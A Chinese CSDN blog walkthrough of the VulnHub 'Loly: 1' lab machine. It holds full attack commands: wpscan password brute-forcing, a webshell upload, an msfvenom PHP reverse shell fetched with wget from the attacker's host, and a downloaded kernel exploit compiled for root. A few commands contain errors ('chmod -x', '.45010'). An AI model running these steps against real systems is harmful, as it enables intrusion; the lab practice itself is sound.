vulnhub Loly: 1

最新推荐文章于 2024-06-17 23:23:26 发布
最新推荐文章于 2024-06-17 23:23:26 发布
阅读量1.2k 收藏 18
点赞数 26
文章标签: 安全 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzf011900/article/details/135338585
版权

靶机地址: https://www.vulnhub.com/entry/loly-1,538/

Kali IP:172.16.12.129

1.主机发现

Nmap -sP 172.16.12.0/24

2.端口扫描

nmap -P 172.16.12.130

3.访问

4.目录扫描

dirb http://172.16.12.130/

扫描到/wordpress

5.爆破wordpress用户名和密码

wpscan --url http://172.16.12.130/wordpress -e

爆破密码

wpscan --url http://172.16.12.130/wordpress -U loly -P /usr/share/wordlists/rockyou.txt

6. 访问http://172.16.12.130/wordpress/wp-login.php

判断loly.lc是域名

7. 修改/etc/hosts文件

vim /etc/hosts

8.登录

9. 发现AdRotate的Manage Media中有一个上传文件的地方

10. 写一个木马并压缩,上传

11.访问http://172.16.12.130/wordpress/wp-content/banners/123.php,连接蚁剑

12. 查看靶机上的/var/www/html/wordpress/wp-config.php文件,发现数据库密码为

Lolyisabeautifulgirl

13. 连接msf

利用msf生成反弹连接木马

msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.12.129 lport=4444 -o shell.php

开放python简易下载模块

python -m http.server 888

蚁剑下载反弹连接木马

wget 172.16.12.129:888/shell.php

14.开启msf监听

msfconsole

use multi/handler

set lhost 172.16.12.129

set payload php/meterpreter/reverse_tcp

run

15.访问http://172.16.12.130/wordpress/shell.php,因为我木马下载到了wordpress下,所以我访问这个地址

Msf连接成功

16. 利用交互式shell成功提权www用户

shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

17.切换loly用户

su loly

18. 查看内核版本 找一下有没有漏洞

uname -a

searchsploit ubuntu 16.04

将对应木马复制进本地

searchsploit -m 45010.c  

开启python简易http服务

python -m http.server 888

19. 靶机下载木马并执行

wget 172.16.12.129:888/45010.c

增加执行权限

chmod -x 45010.c

执行

gcc 45010.c -o 45010

.45010

20.查看flag

cat /root/root.txt

什么都好奇
关注
  • 26
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
OSCP-1-5-loly(wordpress、爆破密码上传webshell、配置文件、ubuntu4.4)
墨痕诉清风的博客
08-02 140
登录,上传zip格式文件webshell。添加 /etc/hosts。这里利用搜索也可以找到密码。nmap只获取到80端口。配置文件泄露loly密码。执行路径反弹shell。
JavaScript:创建对象(原型模式和构造函数模式)
m0_47147246的博客
07-15 150
JavaScript:创建对象(原型模式和构造函数模式)
LOLY: 1靶机
logan_logan的博客
07-19 601
1.端口扫描 2.在网页输入IP地址的时候发现一直跳转成loly.lc,所以在/etc/hosts添加一条解析; 3.目录枚举 通过目录枚举发现CMS是wordpress,直接上wpscan; gobuster dir -u http://10.36.101.181/wordpress -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 4.WPSCAN枚举 经过枚举,成功得到用户名和密码; wpscan --url htt
【打靶练习】vulnhub: loly
守拙的博客
07-23 239
loly靶机操作练习,主要为wordpress渗透
Vulnhub靶场渗透实战—Loly
weixin_71914594的博客
10-25 188
靶场地址:https://www.vulnhub.com/entry/loly-1,538/靶场下载:https://download.vulnhub.com/loly/Loly.ova(下载后直接用Vmware打开)将靶机与攻击机放入同一网段攻击机:192.168.237.137靶机:192.167.237.163。
fun html5 qq,Loly fun HTML5 games
weixin_39895995的博客
06-20 177
Welcome to m.lolygames.com where you can play all sorts of free online games, including Puzzle games, Girl games, Dress-up games, Barbie games, Time Management games, Racing games, Arcade games and Hi...
经验分享:RuntimeException: Unable to instantiate service com.***.push.getui.GetuiPushIntentService
独领fengsao的猫
09-10 1260
背景: 升级 push 服务,下线个推,切换成其他三方 push 服务,出现以下 crash: java.lang.RuntimeException: Unable to instantiate service com.**.getui.GetuiPushIntentService: java.lang.ClassNotFoundException: Didn't find class "co...
ctf-2020-12-10
v_3483608762的博客
12-10 1389
1.没人比我更懂金木的痛 (1)打开压缩包。有一个音频和一张图。还有一个压缩包,压缩包已加密。看来通过音频和图来获得的密码,音频是用吉他弹得Unravel (还不错,没准以后可以学学)。他的文件名是看看文件的结尾,U2FsdGVkX1/nSQN+hoHL8OwV9iJB/mSdKk5dmusulz4= 一开始以为是base64,但不会这么简单。再看另一张图片。啊啊金木小天使 照样把小天使放到010里,然后发现结尾好像还有一张图。 分离。 然后上网aes解密。 2.打开压缩包还是音频,这次放到010里就没
VulnHub】【2023年07月18日】最新全部靶场详情(上)
惟忆
07-18 8300
【代码】【VulnHub】【2023年07月18日】最新全部靶场详情(上)
loly - lossless to loosely-开源
05-09
LOLY代表“无损到松散”,这是一个bash脚本,用于解码无损音频文件,拆分wavchunk并将拆分后的wav文件编码为具有自动标记支持(到目前为止仅m4a)的松散编码文件(根据CUE工作表文件)。
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装
最新发布
qq_43684686的博客
06-17 88
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装。重新执行安装程安装到 d:\a-vm。在D盘新建一个文件夹a-vm,
MVC 框架安全
A526847的博客
06-17 458
举例来说,在“注入攻击”一章中,我们并没有使用 PHP 的 magic_quotes_gpc 作为一项 对抗 SQL 注入的防御方案,这是因为 magic_quotes_gpc 是有缺陷的,它并没有在正确的地方 解决问题。其次,对于一些常见的漏洞来说,由程序员一个个修补可能会出现遗漏,而在框架中统一 解决,有可能解决“遗漏”的问题。最后,在每个业务里修补安全漏洞,补丁的标准难以统一,而在框架中集中实施的安全方 案,可以使所有基于框架开发的业务都能受益,从安全方案的有效性来说,更容易把握。
如何确保数据跨域交换安全、合规、可追溯性?
文件数据安全交换
06-14 543
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
《软件定义安全》之八:软件定义安全案例
大龄IT民工
06-13 1225
Embrane是一家虚拟设备提供商,由Cisco公司前员工创立,该公司致力于实现网络功能实体的软件化,旨在研发出多服务、分布式软件架构的网络服务产品。它于2015年4月被Cisco公司收购。Embrane的软件定义架构称为Heleos,利用虚拟通信设备代替原有基于专有硬件平台的设备,通过一个集中的控制台对虚拟设备进行管理和控制。Heleos与原来的应用交付网络(ADN)产品较为接近,是基于软件的L4~L7虚拟设备,包括负载均衡产品、防火墙、VPN产品和SSLOffload Engine。
Java中的安全管理器和权限控制
weixin_53840353的博客
06-13 640
Java安全管理器是一种允许应用程序在运行时检查对系统资源(如文件和网络)的访问权限的机制。通过定义和安装自定义的安全策略,程序员可以控制哪些代码能够执行特定的操作,从而保护系统资源的安全。@Override// 自定义安全策略throw new SecurityException("写文件操作被禁止!");try {// 尝试写文件操作System.err.println("安全异常:" + e.getMessage());在这个示例中,自定义的禁止所有文件写操作。
NTFS安全权限
2302_80097039的博客
06-12 757
NTFS权限是基于。
Veeam Backup Enterprise Manager身份验证绕过漏洞(CVE-2024-29849)
lujiawei00的专栏
06-11 586
对于无法立即将 Veeam Backup Enterprise Manager 升级到 12.1.2.172 的客户,可执行以下缓解措施: 1.通过停止 Veeam Backup Enterprise Manager 软件来缓解该漏洞,可停止并禁用以下服务(禁用服务不会阻止安装 12.1.2 更新,但更新后需要将服务重置回自动启动):
餐饮食堂安全守护者:可燃气体报警器故障处理与检测要点解析
BDjiance的博客
06-17 182
在餐饮食堂中,可燃气体报警器的正常运行对于预防火灾和保障人员安全至关重要。接下来,佰德将围绕可燃气体报警器的故障现象识别、原因排查、安全操作准则、专业工具与备件、故障处理步骤、验证与测试以及维护与保养建议等方面进行详细阐述,帮助相关人员更好地应对可燃气体报警器故障。
采用PHP语言(医院安全不良事件上报系统源码)医院不良事件 各类事件分析、分类、处理流程
爱笑的源码博客
06-11 1202
分为外部报告系统和内部报告系统两类。内部报告系统主要以个人为报告单位,由医院护理主管部门自行管理的报告系统。外部报告系统主要以医院护理主管部门为报告单位,由卫生行政部门或行业组织管理的报告系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

什么都好奇

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值